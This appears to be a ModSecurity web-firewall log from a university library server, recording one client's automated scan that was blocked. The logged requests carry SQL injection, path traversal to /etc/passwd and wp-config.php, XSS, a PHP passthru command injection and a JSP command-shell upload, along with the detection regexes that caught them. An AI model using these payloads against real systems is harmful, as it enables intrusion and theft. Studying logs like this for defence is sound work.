[Tue Aug 29 11:47:16.357529 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAjy51cAAAAG"]
[Tue Aug 29 11:47:18.491882 2023] [:error] [pid 2302] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAj@-t4AAAAI"]
[Tue Aug 29 11:47:19.365277 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAhui8MAAAAr"]
[Tue Aug 29 11:47:19.536940 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjCbFYAAAAB"]
[Tue Aug 29 11:47:22.375833 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAjKyxEAAAAQ"]
[Tue Aug 29 11:47:23.387655 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAi2yHwAAAAN"]
[Tue Aug 29 11:47:25.370294 2023] [:error] [pid 2303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAj-eS0AAAAE"]
[Tue Aug 29 11:47:25.442690 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAjL8T8AAAAR"]
[Tue Aug 29 11:47:26.367522 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAh133QAAAAz"]
[Tue Aug 29 11:47:27.402923 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14X8Co-f0AAAjcHZIAAAAY"]
[Tue Aug 29 11:47:31.452796 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAjCbHEAAAAB"]
[Tue Aug 29 11:47:32.894917 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAjW9D8AAAAA"]
[Tue Aug 29 11:47:34.642721 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAjW9FEAAAAA"]
[Tue Aug 29 11:47:36.443079 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14aMCo-f0AAAjCbIkAAAAB"]
[Tue Aug 29 11:47:37.495181 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14acCo-f0AAAjKyy0AAAAQ"]
[Tue Aug 29 11:47:39.408242 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAkBKnIAAAAb"]
[Tue Aug 29 11:47:40.385404 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAhl0LQAAAAi"]
[Tue Aug 29 11:47:40.393288 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAhl0LQAAAAi"]
[Tue Aug 29 11:47:41.525062 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAjM7GEAAAAT"]
[Tue Aug 29 11:47:41.533158 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAjM7GEAAAAT"]
[Tue Aug 29 11:47:41.651708 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bcCo-f0AAAkNPnIAAAAI"]
[Tue Aug 29 11:47:42.403348 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAjZRcYAAAAS"]
[Tue Aug 29 11:47:43.608615 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAkNPnsAAAAI"]
[Tue Aug 29 11:47:44.381987 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14cMCo-f0AAAkNPn8AAAAI"]
[Tue Aug 29 11:47:44.420696 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAhl0LkAAAAi"]
[Tue Aug 29 11:47:45.378383 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14ccCo-f0AAAjL8WMAAAAR"]
[Tue Aug 29 11:47:47.234329 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAkBKnsAAAAb"]
[Tue Aug 29 11:47:48.353348 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAjdQP8AAAAZ"]
[Tue Aug 29 11:47:48.444030 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/search"] [unique_id "ZO14dMCo-f0AAAjdQQIAAAAZ"]
[Tue Aug 29 11:47:49.496894 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAi2yK4AAAAN"]
[Tue Aug 29 11:47:49.564139 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAkBKogAAAAb"]
[Tue Aug 29 11:47:50.353060 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAj1194AAAAa"]
[Tue Aug 29 11:47:50.364713 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjtc4kAAAAX"]
[Tue Aug 29 11:47:50.397198 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\r\\n  "name": "test"\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5cr\\x5cn  \\x22name\\x22: \\x22test\\x22\\x5cr\\x5cn}: {\\x0d\\x0a  \\x22name\\x22: \\x22test\\x22\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/website/blog/"] [unique_id "ZO14dsCo-f0AAAjrbKYAAAAP"]
[Tue Aug 29 11:47:50.415347 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAkaC@0AAAAJ"]
